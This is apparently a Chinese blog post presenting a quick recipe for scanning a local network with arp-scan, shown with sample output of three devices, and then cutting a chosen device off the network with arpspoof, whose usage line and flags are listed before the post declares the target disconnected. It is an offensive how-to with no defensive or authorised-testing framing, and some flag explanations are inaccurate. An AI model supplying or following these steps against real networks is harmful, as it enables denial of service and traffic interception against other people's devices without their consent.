快速扫描局域网的设备并且执行断网攻击

sudo arp-scan -I eth0 -l

-I (interface) 选择网络接口

-L(localhost) 扫描局域网

结果:

Interface: eth1, type: EN10MB, MAC: 00:15:5d:5c:b1:02, IPv4: 192.168.2.123
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.2.2 0c:3a:fa:ce:65:c0 New H3C Technologies Co., Ltd
192.168.2.114 fc:a3:10:6e:7a:0d (Unknown)
192.168.2.192 5a:4e:ff:9d:3f:97 (Unknown: locally administered)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.924 seconds (133.06 hosts/sec). 3 responded 

开始攻击

arpspoof
Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host

-i 网络接口名称

-c 攻击者 ip 地址

-t 目标 ip 地址

-r 网关/路由 ip 地址

目标成功断网

小蜘蛛更好

© 版权声明
THE END
喜欢就支持一下吧
点赞5赞赏 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容